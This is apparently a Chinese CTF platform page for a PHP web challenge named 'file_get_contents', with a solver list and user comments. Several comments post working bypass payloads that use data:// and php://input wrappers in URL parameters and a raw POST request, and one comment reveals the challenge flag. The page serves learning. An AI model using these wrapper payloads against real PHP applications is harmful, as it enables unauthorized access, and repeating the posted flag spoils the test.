file_get_contentsWEB 未解决
分数:
30
金币:
3
题目作者:
harry
一 血:
npfs
一血奖励:
2金币
解 决:
5418
提 示:
描 述:
file_get_contents????
评分(8)
解题动态
huasan2410 攻破了该题 15小时前
yuanchu 攻破了该题 18小时前
VCD 攻破了该题 19小时前
花猫咪 攻破了该题 1天前
gm26ctf 攻破了该题 2天前
kimol 攻破了该题 3天前
nonlvyx 攻破了该题 3天前
qqai 攻破了该题 3天前
white1build 攻破了该题 4天前
lps666 攻破了该题 5天前
AWDAI 攻破了该题 5天前
yt430u 攻破了该题 5天前
wauo3 攻破了该题 5天前
niubill 攻破了该题 5天前
青春小豆 攻破了该题 5天前
Versemos 攻破了该题 6天前
ljjbit 攻破了该题 6天前
MirrorJon 攻破了该题 6天前
bzsy01 攻破了该题 7天前
评论
steve07222 3年前
举报
http://114.67.175.224:18454/?ac=1&fn=data://text/plain,1
wxy1343 3年前
举报
http://114.67.175.224:15664/?ac=1&fn=data:,1
wxy1343 3年前
举报
flag{6fccd47ef5e5988f1e2c4989bf554614}
你比大葱更美丽 3年前
举报
用php://input的话post传参hackbar好像不行,我是用burp抓包传的才行的
turriT0Psis 1年前
举报
谢谢,我试了好久都不行,多亏受到您的点拨
Striker123456 3年前
举报
简简单单的变量覆盖
Striker123456 3年前
举报
@J_0k3r 没有extract的$fn就不可控了
J_0k3r 3年前
举报
不是文件包含吗QAQ,跟变量覆盖有什么关系
zdfy005 3年前
举报
POST /?ac=flag&fn=php://input HTTP/1.1 删除Content-Type: POST flag
wjwjwjwcwcwc 3年前
举报
http://114.67.175.224:18854/?ac=1&fn=php://input hackbar中post赋值1
aWxvdmVjdGY 3年前
举报
使用php://input伪协议绕过 ① 将要GET的参数?xxx=php://input ② 用post方法传入想要file_get_contents()函数返回的值 用data://伪协议绕过 将url改为:?xxx=data://text/plain;base64,想要file_get_contents()函数返回的值的base64编码 或者将url改为:?xxx=data:te
笨笨笨蛋 3年前
举报
看到file_get_contents就应该想到用php://input 学到了
有的是饭 3年前
举报
?ac=2&fn=data://text/plain,2 就用伪协议传入文件流,我就随便写了个2,直接出flag。
Raki 3年前
举报
牛!